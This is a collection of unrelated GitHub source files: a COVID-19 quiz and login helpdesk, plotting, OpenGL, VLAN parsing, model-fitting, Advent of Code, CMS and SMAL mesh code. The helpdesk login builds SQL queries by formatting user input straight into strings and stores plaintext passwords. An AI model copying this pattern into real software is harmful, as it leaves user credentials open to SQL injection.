score)\r\n print (\"\\n\")\r\n answer2= input (\"What can prevent us from Covid-19? \\na. SOCIAL DISTANCING \\nb. WEARING MASK \\nc. ALL OF THESE \\nAnswer: \")\r\n if answer2 == \"c\" or answer2 == \"ALL OF THESE\":\r\n score += 1\r\n print(\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is ALL OF THESE\")\r\n print (\"Score: \", score)\r\n print (\"\\n\")\r\n answer1 = input (\"What is the minimum distance to be kept from each other to avoid COVID-19? \\na. 1-2m \\nb. 5-8m \\nc. 1km \\nAnswer: \")\r\n if answer1== \"a\" or answer1 ==\"1-2m\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! 
The answer is 1-2m.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"For how long should one be quarantined if exposed to COVID-19? \\na. no need to be quarantined \\nb. 14 days \\nc. 14 weeks \\nAnswer: \")\r\n    if answer1== \"b\" or answer1 ==\"14 days\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is 14 days.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"When was COVID-19 first reported in India? \\na. 2021 \\nb. 2019 \\nc. 2020 \\nAnswer: \")\r\n    if answer1== \"c\" or answer1 ==\"2020\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is 2020.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"Where was COVID-19 first reported in India? \\na. Delhi \\nb. Kerala \\nc. Maharashtra \\nAnswer: \")\r\n    if answer1== \"b\" or answer1 ==\"Kerala\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is Kerala.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"What are the most common symptoms of Covid? \\na. Fever \\nb. Cough \\nc. both a and b \\nAnswer: \")\r\n    if answer1== \"c\" or answer1 ==\"both a and b\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is both a and b.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"Which state has had the highest number of Covid cases in India? \\na. Maharashtra \\nb. Tamil Nadu \\nc. Uttar Pradesh \\nAnswer: \")\r\n    if answer1== \"a\" or answer1 ==\"Maharashtra\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is Maharashtra.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"When did the 2nd wave of Coronavirus hit India? \\na. 2019 \\nb. 2020 \\nc. 2021 \\nAnswer: \")\r\n    if answer1== \"c\" or answer1 ==\"2021\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is 2021.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"Where was Omicron (Variant of Covid-19) first detected? \\na. South Africa \\nb. India \\nc. China \\nAnswer: \")\r\n    if answer1== \"a\" or answer1 ==\"South Africa\":\r\n        score += 1\r\n        print (\"Correct!\")\r\n        print (\"Score: \", score)\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"Incorrect! The answer is South Africa.\")\r\n        print (\"Score: \", score)\r\n        print (\"\\n\")\r\n    answer1 = input (\"Are you fully vaccinated? \\na. Yes \\nb. No, not yet \\nAnswer: \")\r\n    if answer1== \"a\" or answer1 ==\"Yes\":\r\n        print (\"That's GREAT! You are expected to follow all other Government guidelines too like Social distancing, etc. Keep it up.\")\r\n        print(\"\\n\")\r\n    else:\r\n        print (\"We encourage you to get vaccinated as soon as possible. Your small action can curb the spread. 
You are also expected to follow all other Government guidelines too like Social distancing, etc.\")\r\n print (\"\\n\")\r\n if score <=5:\r\n print (\"your total score is :\",score,\" -nice try, better luck next time\")\r\n elif score >=6:\r\n print (\"your total score is :\",score,\"- you are doing great!\")\r\nprint(\"#####################\")\r\nprint(\"PROTEGO COVID-19 HELPDESK\")\r\nprint(\"#####################\")\r\nprint(\"1. Register/Forgot your credentials\")\r\nprint(\"2. Login\")\r\nchoice=int(input(\"Enter your choice:\"))\r\nwhile True:\r\n if choice==1:\r\n No=n\r\n Name=input(\"Enter your name:\")\r\n Loginid=input(\"Enter your new 10-digit Login id:\")\r\n password=input(\"Enter your new 6-digit password:\")\r\n query=\"Insert into Log values({},'{}','{}','{}')\".format(No,Name,Loginid,password)\r\n n+=1\r\n cur.execute(query)\r\n con.commit()\r\n print(\"Successfully inserted....!\")\r\n print(\"Now you may login!\")\r\n Log=input(\"Enter the Login Id:\")\r\n pas=input(\"Enter your password:\")\r\n if Loginid==Log and password==pas:\r\n print(\"You have successfully logged in....!\")\r\n print(\"#####################\")\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n gh=int(input(\"Enter your choice:\"))\r\n if gh==1:\r\n Map()\r\n elif gh==2:\r\n Graph()\r\n elif gh==3:\r\n Track()\r\n elif gh==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n poi=\"Y\"\r\n while poi==\"Y\" or poi==\"y\":\r\n poi=input(\"Do you want to view other choices?(Y/N):\")\r\n if poi!=\"Y\" and poi!=\"y\":\r\n print(\"Exiting...\")\r\n print(\"#####################\")\r\n break\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n pop=int(input(\"Enter your choice:\"))\r\n if pop==1:\r\n Map()\r\n elif pop==2:\r\n Graph()\r\n elif pop==3:\r\n Track()\r\n elif pop==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n else:\r\n print(\"Something went wrong...Credentials not matching\")\r\n elif choice==2:\r\n print(\"Now you may login!\")\r\n Log=input(\"Enter the Login Id:\")\r\n pas=input(\"Enter your password:\")\r\n cur.execute(\"Select Loginid,password from Log where Loginid='{}' and password='{}'\".format(Log,pas))\r\n row=cur.fetchone()\r\n if row!=None:\r\n print(\"You have successfully logged in....!\")\r\n print(\"#####################\")\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n gh=int(input(\"Enter your choice:\"))\r\n if gh==1:\r\n Map()\r\n elif gh==2:\r\n Graph()\r\n elif gh==3:\r\n Track()\r\n elif gh==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n poi=\"Y\"\r\n while poi==\"Y\" or poi==\"y\":\r\n poi=input(\"Do you want to view other choices?(Y/N):\")\r\n if poi!=\"Y\" and poi!=\"y\":\r\n print(\"Exiting...\")\r\n print(\"#####################\")\r\n break\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. 
Quiz\")\r\n pop=int(input(\"Enter your choice:\"))\r\n if pop==1:\r\n Map()\r\n elif pop==2:\r\n Graph()\r\n elif pop==3:\r\n Track()\r\n elif pop==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n else:\r\n print(\"Something went wrong...Credentials not found\")\r\n else:\r\n print(\"Choose from the options\")\r\n","repo_name":"SIyer-45/Protego","sub_path":"protego.py","file_name":"protego.py","file_ext":"py","file_size_in_byte":18287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28215800927","text":"import pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.offline import plot\nimport plotly.express as px\n\ndef make_figures(data, track_name, popularity):\n\n # Build Figure Section ----------------------------------------------\n categories = [\"energy\", \"liveness\", \"speechiness\",\t\"acousticness\",\t\"instrumentalness\", \"danceability\",\t\"valence\"]\n \n r = data.mean()\n # Avg audio features of the TOP 500 Rolling Stones Magazine\n r2 = [0.601546, 0.215710, 0.064273, 0.345752, 0.037234, 0.554010, 0.638210]\n # Avg audio features of the TOP Tracks 2020 Germany\n r3 = [0.658820, 0.169402, 0.148086, 0.223102, 0.019515, 0.737580, 0.539320]\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatterpolar(\n r=r,\n theta=categories,\n fill='toself',\n name='Your playlist profile',\n fillcolor=\"red\"\n ))\n fig.add_trace(go.Scatterpolar(\n r=r2,\n theta=categories,\n fill='toself',\n fillcolor=\"green\",\n name='TOP 500 Rolling Stones Magazine Profile',\n opacity = 0.4,\n visible='legendonly'\n ))\n fig.add_trace(go.Scatterpolar(\n r=r3,\n theta=categories,\n fill='toself',\n fillcolor='blue',\n name='TOP Tracks 2020 Germany',\n opacity = 0.4,\n visible='legendonly'\n ))\n\n fig.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 1]\n )),\n showlegend=True,\n title=\"Your music profile\",\n title_x=0.5,\n font=dict(\n family=\"Arial\",\n size=12,\n color=\"black\"),\n legend=dict(\n orientation=\"v\",\n y=-0.45,\n x=0.3\n ),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)'\n )\n\n fig.update_traces(mode=\"none\", selector=dict(type='scatterpolar'))\n\n config = dict({'displaylogo': False,\n 'scrollZoom': True,\n 'displayModeBar': False\n })\n\n figure = plot(fig, config=config, output_type='div')\n\n # Violin Figure Section ----------------------------------------------------------------\n data_violin = {\"tracks\": track_name,\n \"popularity\": popularity}\n\n df_violin = pd.DataFrame(data_violin, columns = ['tracks', 'popularity'])\n\n fig_violin = px.violin(df_violin[\"popularity\"], box=True,# draw box plot inside the violin\n points='outliers', # can be 'outliers', 'all', or False\n )\n\n fig_violin.update_layout(title=\"Popularity of your Music\",\n title_x=0.5,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)'\n )\n\n config_violin = dict({'displaylogo': False,\n 'scrollZoom': True,\n 'displayModeBar': False\n })\n\n fig_violin_plot = plot(fig_violin, config=config_violin, output_type='div')\n\n return figure, fig_violin_plot","repo_name":"marwonn/spotify-playlist-generator-analyzer","sub_path":"helper/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"36"} +{"seq_id":"29997837249","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, 
QOpenGLWidget\n\n\nclass MyGLWindow(QOpenGLWidget):\n\n    def __init__(self, parent=None):\n        super(MyGLWindow, self).__init__(parent)\n\n    def initializeGL(self):\n        # Initialize the various state values before performing any OpenGL drawing\n        glClearColor(0.8, 0.8, 0.6, 1.0)\n\n    def resizeGL(self, width, height):\n        # Set the camera's projection properties here\n        glMatrixMode(GL_PROJECTION)\n        glLoadIdentity()\n\n    def paintGL(self):\n        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n        glMatrixMode(GL_MODELVIEW)\n        glLoadIdentity()\n\n        # Draw an object using a color and primitives\n        glColor3f(0.5, 0.5, 0.8)\n        glBegin(GL_TRIANGLES)\n        glVertex3fv([-1.0, 0.0, 0.0])\n        glVertex3fv([ 1.0, 0.0, 0.0])\n        glVertex3fv([ 0.0, 1.0, 0.0])\n        glEnd()\n\n        # Send the rendered framebuffer to the screen\n        glFlush()\n\ndef main(argv = []):\n    app = QApplication(argv)\n    window = MyGLWindow()\n    window.setWindowTitle('Example1')\n    window.setFixedSize(600, 600)\n    window.show()\n    sys.exit(app.exec_())\n\nif __name__ == '__main__':\n    main(sys.argv)\n","repo_name":"dknife/2021Graphics","sub_path":"Source/01_Windowing/03_FirstGLWindow.py","file_name":"03_FirstGLWindow.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"22773599993","text":"import json\nimport sys\n\n# Define a function to parse a JSON file and extract VLAN IDs\ndef parse_vlans(filename):\n\n    # Try to open the file and load its contents as JSON\n    try:\n        with open(filename) as f:\n            data = json.load(f)\n    \n    # If there is an error parsing the JSON, print an error message and return None\n    except json.JSONDecodeError:\n        print(f\"Error parsing {filename} as JSON\")\n        return None\n\n    # Create an empty set to store the VLAN IDs\n    vlan_ids = set()\n    \n    # Iterate over each item in the JSON data\n    for item in data.get(\"items\", []): \n        # Get the VLAN ID from the current item\n        vlan_id = item.get(\"vn_instance\", {}).get(\"vlan_id\")\n        \n        # If the VLAN ID exists, add it to the set of VLAN IDs\n        if vlan_id:\n            vlan_ids.add(int(vlan_id))\n\n    # If no VLAN IDs were found, return None\n    if not vlan_ids:\n        return None\n\n    # Return the list of VLAN IDs\n    return list(vlan_ids)\n\n# Define a function to print the results of the VLAN extraction\ndef print_results(filename, vlans):\n\n    # If no VLANs were found, print an error message and return\n    if not vlans:\n        print(f\"No VLANs found in {filename}\")\n        return\n\n    # Print the filename and the list of VLANs\n    print(f\"VLANs from {filename}:\")\n    print(vlans)\n    print(f\"Count: {len(vlans)}\")\n\n# Call the functions to parse the JSON files and print the results\nfile1 = \"rz.json\"\nfile2 = \"vlans.json\"\n\nvlans1 = parse_vlans(file1)\nprint_results(file1, vlans1)\n\nvlans2 = parse_vlans(file2)\nprint_results(file2, vlans2)","repo_name":"deltasierra/blueprint_vlans","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28295142405","text":"# Implements shooting method for Sigmoidal kinetics model\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Sigmoidal(nn.Module):\n    def __init__(self, n_vars):\n        super(Sigmoidal, self).__init__()\n        self.n_vars = n_vars\n        self.lin2 = nn.Linear(self.n_vars, self.n_vars)\n        self.lin1 = nn.Linear(self.n_vars, self.n_vars)\n\n    def forward(self, state):\n        z = torch.sigmoid(self.lin1(state))\n        return self.lin2(z)\n\n    # parameter inference with stochastic gradient descent\n    # inputs:\n    #   states: np.array(steps, n_vars)\n    # 
velocities: np.array(steps, n_vars)\n # steps: int\n # output:\n # np.array(n_vars, n_vars) of final parameters\n def solve(self, states, velocities, iterations=1000, lr=1.0):\n states = torch.tensor(states, dtype=torch.float)\n velocities = torch.tensor(velocities, dtype=torch.float)\n optim = torch.optim.SGD(self.parameters(), lr=lr)\n for i in range(iterations):\n optim.zero_grad()\n output = self.forward(states)\n loss = F.mse_loss(output, velocities)\n loss.backward()\n optim.step()\n\n # rolls out a trajectory from optional initial condition\n # inputs:\n # state: np.array(n_vars) - initial states\n # velocity: np.array(n_vars) - initial time derivative\n # delta: float - time difference between steps\n # steps: int - number of steps to roll out\n # output:\n # np.array(steps, n_vars), np.array(steps, n_vars)\n # states and velocities for each simulated timestep\n def run(self, state=None, velocity=None, delta=0.001, steps=100):\n if state is None:\n state = np.random.random(self.n_vars)\n if velocity is None:\n velocity = np.random.random(self.n_vars)\n states = []\n velocities = []\n with torch.no_grad():\n state = torch.tensor(state, dtype=torch.float)\n velocity = torch.tensor(velocity, dtype=torch.float)\n for i in range(steps):\n velocity = self.forward(state)\n states.append(state.numpy().copy())\n velocities.append(velocity.numpy().copy())\n state += velocity * delta\n return np.vstack(states), np.vstack(velocities)\n","repo_name":"warut-vijit/modelsel","sub_path":"sigmoidal.py","file_name":"sigmoidal.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29719161157","text":"\"\"\"\nDay 1 part 2\n\namount of fuel for a module is based on mass\nfloor(mass / 3) - 2\n\npart 2: we need to calculate fuel for the fuel...\nas long as the calculated fuel is not negative \n (aka the floor doesen't amount to 2 or less)\nthen we need to add the new fuel\n\ntest cases\n12 -> 2\n14 -> 2\n1969 -> 654 + 216 + 70 + 21 + 5 = 966\n100756 -> 33583 + 11192 + 3728 + 1240 + 411 + 135 + 43 + 12 + 2 = 50346\n\noutput:\nsum of the fuel required for each module\n\"\"\"\nfrom utils import read_input\n\n\ndef calc_fuel(mass):\n \"\"\"floor of the mass divided by 3 minus 2\"\"\"\n fuel = (mass // 3) - 2\n # check if added fuel is less than 0\n if fuel <= 0:\n return 0\n # otherwise recurse to add the fuel for our fuel\n return fuel + calc_fuel(fuel)\n\n\ndef tests():\n \"\"\"tests from the description\"\"\"\n assert calc_fuel(12) == 2\n assert calc_fuel(14) == 2\n assert calc_fuel(1969) == 966\n assert calc_fuel(100756) == 50346\n\n\ntests()\n\nassert sum(calc_fuel(int(l)) for l in read_input(1)) == 5268207\n","repo_name":"yknot/adventOfCode","sub_path":"2019/01_02.py","file_name":"01_02.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35852780796","text":"from __future__ import absolute_import\n\nfrom .base import ContentView, EditView\nfrom ..models.image import Image\nfrom ..parser import Parser\nfrom pyramid.view import render_view\nfrom ..blocks.registry import Registry\nfrom ..utils import generate_id\n\nfrom chameleon import PageTemplate\n\n\nclass PageView(ContentView):\n\n \"\"\" Project specific view \"\"\"\n\n def __init__(self, context, request):\n\n ContentView.__init__(self, context, request)\n\n @property\n def is_edit(self):\n\n return False\n\n @property\n def can_edit(self):\n\n 
return self.request.has_permission(\"edit\", self.context)\n\n @property\n def content(self):\n\n \"\"\" We may or may not use a complex layout... \"\"\"\n\n if not self.context._data_['use_complex_layout']:\n\n return self.context._data_['text']\n\n html = []\n\n self.request.is_edit = self.is_edit\n\n height = 0\n\n for block in self.context.blocks:\n\n try:\n block_height = int(float(block.get(\"height\", \"200px\")[:-2]))\n block_top = int(float(block.get(\"top\", \"10px\")[:-2]))\n\n height = max(height, block_top + block_height)\n except:\n pass\n\n html.append(render_view(block, self.request))\n\n return \"\"\"
    %s
    \"\"\" \\\n % (height + 20, \"\".join(html))\n\n @property\n def layout(self):\n\n html = []\n\n self.request.is_edit = self.is_edit\n\n for block in self.context.blocks:\n\n html.append(render_view(block, self.request))\n\n return \"\".join(html)\n\n\nclass PageBlocks(PageView):\n\n \"\"\" Block view of page \"\"\"\n\n @property\n def blocks(self):\n\n res = []\n\n for block in self.context.blocks:\n\n self._create_block_repr(block, res)\n\n return \"\".join(res)\n\n def _create_block_repr(self, block, data):\n\n data.append(\"\"\"
    \"\"\")\n data.append(\"\"\"\"\"\" % block.id)\n data.append(\"
    \")\n\n\nclass PageEdit(EditView):\n\n pass\n\n\nclass PageLayout(PageView):\n\n \"\"\" Edit view for page \"\"\"\n\n @property\n def is_edit(self):\n\n return True\n\n @property\n def raw_content(self):\n\n return self.context._content\n\n def save(self):\n\n \"\"\" Parse html, and extract blocks. \"\"\"\n\n parser = Parser(self.context)\n\n self.context.clear_blocks()\n\n parser.parse(self.request.params.get('content', \"\"))\n\n self.context._p_changed = True\n\n self.context._content = self.request.params.get('content', \"\")\n\n return {}\n\n def save_block(self):\n\n \"\"\" but not really... we only create the proper html \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': ''}\n\n block = clazz(self.request.params.get(\"id\"), **self.request.params)\n\n if block['type'] == \"image\":\n\n if self.request.params.get('mode') == 'add':\n\n img_id = self.context.generate_content_id(\n self.request.params.get('img').filename)\n\n img = Image(img_id,\n {'name': img_id,\n 'data': {\n 'name': self.request.params.get('img').filename,\n 'data': self.request.params.get('img').value\n }\n })\n\n self.context.add_content(img)\n\n block['img_url'] = '%s%s' % (self.url, img_id)\n\n self.request.is_edit = True\n\n return \"%s\" % render_view(block, self.request)\n\n self.request.is_edit = True\n\n return render_view(block, self.request)\n\n def add_form(self):\n\n \"\"\" show add form for given type \"\"\"\n\n typp = self.request.params.get('type')\n clazz = Registry.get_type(typp)\n\n if not clazz:\n return {'html': '
    No form found
    '}\n\n tpl = PageTemplate(clazz.add_form)\n\n form = tpl(data={\n 'id': generate_id(prefix=\"%s_\" % typp, length=10)})\n\n return {'html': form}\n\n def edit_form(self):\n\n \"\"\" Show edit form for given block type \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': '
    No form found
    '}\r\n\n        tpl = PageTemplate(clazz.edit_form)\n\n        data = self._params_to_dict(self.request.params)\n        data['mode'] = 'edit'\n\n        form = tpl(data=data)\n\n        return {'html': form}\n\n    def get_block(self, block_id):\n\n        return self.context.get_block_by_ref(block_id)\n\n    def page_actions(self):\n\n        layoutsubs = [\n            {'id': 'grid',\n             'title': 'Grid',\n             'action': 'javascript: pycms.selectLayout(\"grid\")',\n             'permission': 'edit'\n             },\n            {'id': '2col',\n             'title': '2 columns',\n             'action': 'javascript: pycms.selectLayout(\"2col\")',\n             'permission': 'edit'\n             },\n            {'id': '3col',\n             'title': '3 columns',\n             'action': 'javascript: pycms.selectLayout(\"3col\")',\n             'permission': 'edit'\n             },\n            {'id': '4col',\n             'title': '4 columns',\n             'action': 'javascript: pycms.selectLayout(\"4col\")',\n             'permission': 'edit'\n             },\n        ]\n\n        subs = []\n\n        for tp in Registry.list_types():\n\n            subs.append({'id': 'add_%s' % tp,\n                         'title': '%s' % tp,\n                         'action': 'javascript: pycms.addBlock(\"%s\")' % tp,\n                         'permission': 'edit'\n                         })\n\n        return [\n            {'id': 'pick_layout',\n             'title': 'Select layout...',\n             'action': '',\n             'permission': 'edit',\n             'subs': layoutsubs\n             },\n            {'id': 'add_block',\n             'title': 'Add block...',\n             'action': '',\n             'permission': 'edit',\n             'subs': subs\n             },\n            {'id': 'delete',\n             'title': 'Delete',\n             'action': 'javascript: pycms.deleteBlock()',\n             'permission': 'edit'\n             },\n            {'id': 'edit',\n             'title': 'Edit',\n             'action': 'javascript: pycms.editBlock()',\n             'permission': 'edit'\n             },\n            {'id': 'cut',\n             'title': 'Cut',\n             'action': 'javascript: pycms.cutBlock()',\n             'permission': 'edit'\n             },\n            {'id': 'paste',\n             'title': 'Paste',\n             'action': 'javascript: pycms.pasteBlock()',\n             'permission': 'edit'\n             },\n            {'id': 'save',\n             'title': 'Save',\n             'action': 'javascript: pycms.savePage()',\n             'permission': 'edit'\n             },\n        ]\n\n    def _params_to_dict(self, params):\n\n        \"\"\" create simple dict from multidict \"\"\"\n\n        simple = {}\n\n        for key in list(params.keys()):\n\n            simple[key] = params.get(key)\n\n        return simple\n","repo_name":"wyldebeast-wunderliebe/w20e.pycms","sub_path":"w20e/pycms/views/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"20029746349","text":"\"\"\"\n\n    PyTorch implementation of the SMAL/SMPL model\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport pickle as pkl \nfrom .batch_lbs import batch_rodrigues, batch_global_rigid_transformation\nfrom .smal_basics import align_smal_template_to_symmetry_axis, get_smal_template\nimport torch.nn as nn\nimport config\n\n# There are chumpy variables so convert them to numpy.\ndef undo_chumpy(x):\n    return x if isinstance(x, np.ndarray) else x.r\n\n\n'''\nJ_regressor_prior: prior on the joint regressor matrix\nJ_regressor: joint regressor matrix\nf: faces (indices of 3 vertices each)\nkintree_table: kinematic tree table\nJ: joint positions\nweight_prior: skinning weight prior\nweight: skinning weights\nvert_sym_idxs: vertex indices\nposedirs: pose correctives\nbs_type: pose corrective skinning type (lrotmin)\nv_template: T-pose vertex data (base template model)\nshapedirs: shape correctives\nbs_style: shape corrective skinning style (lbs)\n'''\n\n\ndef caclulate_bone_lengths_from_J(J, parents):\n    # NEW: calculate bone lengths:\n    all_bone_lengths_list = []\n    for i in range(1, parents.shape[0]):\n        bone_vec = J[:, i] - J[:, parents[i]]\n        bone_length = torch.sqrt(torch.sum(bone_vec ** 2, axis=1)) # distance between one pair of skeleton joints for each sample in the batch\n        all_bone_lengths_list.append(bone_length)\n    all_bone_lengths = torch.stack(all_bone_lengths_list)\n\n    return 
all_bone_lengths # .permute((1,0))\n\nclass SMAL(nn.Module):\n    def __init__(self, device, shape_family_id=-1, dtype=torch.float):\n        super(SMAL, self).__init__()\n\n        # -- Load SMPL params --\n        # with open(pkl_path, 'r') as f:\n        #     dd = pkl.load(f)\n        \n        with open(config.SMAL_FILE, 'rb') as f:\n            u = pkl._Unpickler(f)\n            u.encoding = 'latin1'\n            dd = u.load()\n\n        self.f = dd['f']\n        '''(7774,3) number of triangle mesh faces'''\n        self.faces = torch.from_numpy(self.f.astype(int)).to(device)\n\n        # replaced logic in here (which required SMPL library with L58-L68)\n        '''(3889,3) base template model'''\n        v_template = get_smal_template(\n            model_name=config.SMAL_FILE,\n            data_name=config.SMAL_DATA_FILE,\n            shape_family_id=-1)\n\n        v_sym, self.left_inds, self.right_inds, self.center_inds = \\\n            align_smal_template_to_symmetry_axis(v_template, sym_file=config.SMAL_SYM_FILE)\n        # Mean template vertices\n        self.v_template = Variable(torch.Tensor(v_sym),requires_grad=False).to(device)\n\n        # Size of mesh [Number of vertices, 3]\n        self.size = [v_template.shape[0], 3]\n        '''(3889,3,41) >> 41'''\n        self.num_betas = dd['shapedirs'].shape[-1]\n        # Shape blend shape basis\n        '''(41,11667)'''\n        shapedir = np.reshape(\n            undo_chumpy(dd['shapedirs']), [-1, self.num_betas]).T.copy()\n\n        self.shapedirs = Variable(\n            torch.Tensor(shapedir), requires_grad=False).to(device)\n\n        # if shape_family_id != -1:\n        #     with open(config.SMAL_DATA_FILE, 'rb') as f:\n        #         u = pkl._Unpickler(f)\n        #         u.encoding = 'latin1'\n        #         data = u.load()\n        #     # Select mean shape for quadruped type\n        #     '''(5,41) >> (41,) select the specified base animal model'''\n        #     # betas = data['cluster_means'][shape_family_id]# per-family model\n        #     betas = np.zeros_like(data['cluster_means'][shape_family_id])\n        #     '''(3889,3)'''\n        #     v_template = v_template + np.matmul(betas[None,:], shapedir).reshape(\n        #         -1, self.size[0], self.size[1])[0]\n\n        # (35,3889)\n        # Regressor for joint locations given shape \n        # self.J_regressor = Variable(\n        #     torch.Tensor(dd['J_regressor'].T.todense()),\n        #     requires_grad=False).to(device)\n\n        self.J_regressor = Variable(\n            torch.Tensor(dd['J_regressor'].T), requires_grad=False).to(device)###\n\n\n        # Pose blend shape basis =306\n        num_pose_basis = dd['posedirs'].shape[-1]\n        \n        posedirs = np.reshape(\n            undo_chumpy(dd['posedirs']), [-1, num_pose_basis]).T\n        self.posedirs = Variable(\n            torch.Tensor(posedirs), requires_grad=False).to(device)\n        # (2,35)\n        # indices of parents for each joint\n        self.parents = dd['kintree_table'][0].astype(np.int32)\n        self.kintree_table = dd['kintree_table']\n\n        # LBS weights\n        self.weights = Variable(\n            torch.Tensor(undo_chumpy(dd['weights'])),\n            requires_grad=False).to(device)\n\n\n    def __call__(self, beta, theta, trans=None, del_v=None, betas_logscale=None, get_skin=True, v_template=None):\n\n        if True:\n            nBetas = beta.shape[1]\n        else:\n            nBetas = 0\n\n        # print(\"\\ntheta: \",theta)\n\n        \n        # v_template = self.v_template.unsqueeze(0).expand(beta.shape[0], 3889, 3)\n        if v_template is None:\n            v_template = self.v_template\n\n        # 1. Add shape blend shapes\n        \n        if nBetas > 0:#20\n            if del_v is None:\n                # print(\"\\nbeta: \", beta)\n                v_shaped = v_template + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n            else:\n                v_shaped = v_template + del_v + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n        else:\n            if del_v is None:\n                v_shaped = v_template.unsqueeze(0)\n            else:\n                v_shaped = v_template + del_v \n        '''regress the 3889 vertices down to 35 joint locations'''\n        # 2. 
Infer shape-dependent joint locations.\n        Jx = torch.matmul(v_shaped[:, :, 0], self.J_regressor)\n        Jy = torch.matmul(v_shaped[:, :, 1], self.J_regressor)\n        Jz = torch.matmul(v_shaped[:, :, 2], self.J_regressor)\n        #(1,35,3)\n        J = torch.stack([Jx, Jy, Jz], dim=2)\n\n        # all_bone_length = caclulate_bone_lengths_from_J(J,self.parents)\n        # print(all_bone_length.shape, all_bone_length)\n        # np.savetxt(\"/media/scau2311/A/xcg/barc_release/data/pig_smal_data/mean_pig_bone_lengths.txt\",\n        #            all_bone_length, fmt=\"%.18f\")\n\n        # 3. Add pose blend shapes\n        # N x 24 x 3 x 3\n        if len(theta.shape) == 4:\n            Rs = theta\n        else:# N x 35 x 3 x 3 global rotations of the joints expressed as 3x3 rotation matrices\n            # theta[0,0] = torch.zeros(1, 3)\n            Rs = torch.reshape(batch_rodrigues(torch.reshape(theta, [-1, 3])), [-1, 35, 3, 3])\n        \n        # Ignore global rotation.\n        # (1,306) rotation of the current pose relative to the rest pose (34 x 9 = 306 values)\n        pose_feature = torch.reshape(Rs[:, 1:, :, :] - torch.eye(3).to(beta.device), [-1, 306])\n        # print(pose_feature)\n        #(1,3889,3)\n        v_posed = torch.reshape(\n            torch.matmul(pose_feature, self.posedirs),# blend shape computation\n            [-1, 